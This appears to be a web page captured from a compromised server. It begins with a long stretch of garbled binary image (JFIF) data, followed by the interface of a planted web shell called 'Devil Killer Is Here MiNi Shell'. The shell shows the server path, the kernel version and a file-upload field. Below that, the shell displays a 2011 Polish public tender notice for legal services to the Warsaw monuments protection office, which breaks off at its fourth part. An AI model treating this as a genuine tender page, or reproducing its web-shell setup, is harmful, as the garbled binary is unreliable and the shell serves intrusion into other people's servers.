JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/330231-N-2011.html

<p class="kh_header"><b>Warszawa: Świadczenie usług prawnych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2012 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ostrołęce, Płocku i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego</b><br>
<b>Numer ogłoszenia: 330231 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Ochrony Zabytków w Warszawie , ul. Nowy Świat 18/20, 00-373 Warszawa, woj. mazowieckie, tel. 22 4430400, faks 22 4430401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mwkz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług prawnych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2012 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ostrołęce, Płocku i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług prawniczych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2012 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ostrołęce, Płocku i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego zgodnie z obowiązującymi przepisami w tym w szczególności:
a)	Z ustawą o ochronie zabytków i opiece nad zabytkami i aktami wykonawczymi do tej ustawy,
b)	Ustawą prawo budowlane i aktami wykonawczymi do tej ustawy,
c)	Ustawą o zagospodarowaniu przestrzennym i aktami wykonawczymi do tej ustawy,
d)	Ustawą Prawo zamówień publicznych i aktami wykonawczymi do tej ustawy,
e)	Ustawą o finansach publicznych i aktami wykonawczymi do tej ustawy,
f)	Kodeksem postępowania administracyjnego,
g)	Ustawą o służbie cywilnej i aktami wykonawczymi do tej ustawy,
h)	Kodeksem pracy,
i)	Kodeksem cywilnym i kodeksem postępowania cywilnego,
j)	Kodeksem karnym i kodeksem wykonawczym,
k)	Kodeksem postępowania karnego,
l)	Kodeksem postępowania w sprawach o wykroczenia,
m)	Ustawy o postępowaniu egzekucyjnym w administracji,
n)	Innymi obowiązującymi przepisami związanymi przede wszystkim z ochroną zabytków i funkcjonowaniem służby cywilnej. Z możliwością składania ofert częściowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wpis na listę radców prawnych bądź adwokatów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed 	upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w 	tym okresie:
- wykonał przynajmniej 2 opinie analizy prawne dotyczące ochrony zabytków dla jednostki administracji publicznej.
- świadczył usługi prawnicze polegające na wykonaniu zastępstwa procesowego jednostki 	administracji publicznej przed sądem w co najmniej 2 sprawach, których przedmiotem był 	spór pomiędzy jednostką administracji publicznej a innym podmiotem.
Zamawiający wybierze ofertę, która uzyskała największą liczbę punktów. Wykonawca łącznie może uzyskać w prowadzonym postępowaniu maksymalnie 100 punktów, w tym: 50 punktów za oferowaną cenę usługi, 25 punktów za doświadczenie w zakresie ochrony zabytków i 25 punktów w zakresie wykonywania usług prawnych. Wskazane w SIWZ w części V Warunki udziału w postępowaniu mają charakter obligatoryjny i minimalny do spełnienia kryteriów udziału w przetargu. Podanie w związku z tym w ofercie  na przykład tylko minimalnych wartości: 2 opinii i 2 spraw powoduje przyznanie minimalnej wartości punktów w tym kryterium oceny - 4 punkty. Za każdą opinię i sprawę będą przyznawane punkty - po 1 (jednym) punkcie za każdą aż do ewentualnego osiągnięcia maksymalnych wartości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie, minimum 1 osobą, posiadającą specjalizację z zakresu prawa pracy, kodeksu   postępowania administracyjnego, ustawy o ochronie zabytków, prawa budowlanego i które posiadają prawo wykonywania zawodu adwokata lub radcy prawnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie, minimum 1 osobą, posiadającą specjalizację z zakresu prawa pracy, kodeksu   postępowania administracyjnego, ustawy o ochronie zabytków, prawa budowlanego i które posiadają prawo wykonywania zawodu adwokata lub radcy prawnego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności prowadzenia spraw prawnych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz Ofertowy - załącznik nr 1 do SIWZ;
2)	Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub potwierdzonej notarialnie kopii-dotyczy wyłącznie pełnomocnictwa) wskazującego osobę uprawnioną do reprezentowania składającego ofertę;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.50</li>
<li>2 - doświadczenie w zakresie ochrony zabytków - 0.25</li>
<li>3 - doświadczenie w zakresie wykonywanych usług prawnych - 0.25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umów stanowią załączniki: nr 8A (zadanie 1-4) i nr 8B (zadanie 5) do SIWZ;
Zawarcie umowy z podmiotami składającymi ofertę wspólną poprzedzone będzie wpisem 
do umowy klauzuli dotyczącej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy;
2.	Zamawiający przewiduje możliwość dokonania zmiany:
a.	Osób, realizujących bezpośrednio przedmiot umowy pod warunkiem, że inna osoba spełniała będzie warunki przedmiotowego postępowania,
b.	Zmiany danych adresowych, NIP pod warunkiem, że zmiany te wynikać będą ze zmian nadanych przez właściwe urzędy,
c.	Zmiany osób reprezentujących strony, pod warunkiem okazania przez Wykonawcę odpowiednich pełnomocnictw,
d.	Zmiany stawki VAT, pod warunkiem że zmiana zostanie wprowadzona zgodnie z obowiązującymi przepisami w trakcie obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mwkz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest w zakładce zamówienia publiczne na stronie internetowej urzędu oraz w siedzibie urzędu: Wojewódzki Urząd Ochrony Zabytków w Warszawie, ul. Nowy Świat 18/20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 09:45, miejsce: Wojewódzki Urząd Ochrony Zabytków w 00-373 Warszawie, ul. Nowy Świat 18/20 w Kancelarii na parterze urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Warszawie przy ulicy Nowy Świat 18/20, o charakterze stałym i w zakresie:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Warszawie przy ulicy Nowy Świat 18/20, o charakterze stałym i w zakresie:

a)	sporządzania opinii prawnych,
b)	zastępstwa procesowego i prawnego; przygotowania, prowadzenia i reprezentowania przed sądami powszechnymi i administracyjnymi, organami administracji państwowej oraz samorządowej,
c)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
d)	uczestniczenia w miarę potrzeb w negocjacjach urzędu z poddostawcami i innymi instytucjami,
e)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
f)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
g)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
h)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
i)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
j)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
k)	analizy pod względem prawnym dokumentacji przetargowej,
l)	udział w posiedzeniach stałych i doraźnych komisji: kontrolnych oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Zamawiającego w Warszawie przy ul. Nowy Świat 18/20 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.50</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.25</li>
<li>3. doświadczeniw w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ostrołęce przy ulicy Kościuszki 16, o charakterze stałym i w  zakresie:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ostrołęce przy ulicy Kościuszki 16, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu,
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególnosci analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Ostrołęce przy ul. Kościuszki 16 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.50</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.25</li>
<li>3. doświadczeniw zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Płocku przy ulicy  Zduńskiej 13A, o charakterze stałym i w  zakresie:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Płocku przy ulicy  Zduńskiej 13A, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, zawieranych porozumień, pism i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji: oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Płocku przy ul. Zduńskiej 13A  w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.50</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.25</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Siedlcach przy ulicy Bema 4A, o charakterze stałym i w  zakresie:.</p>
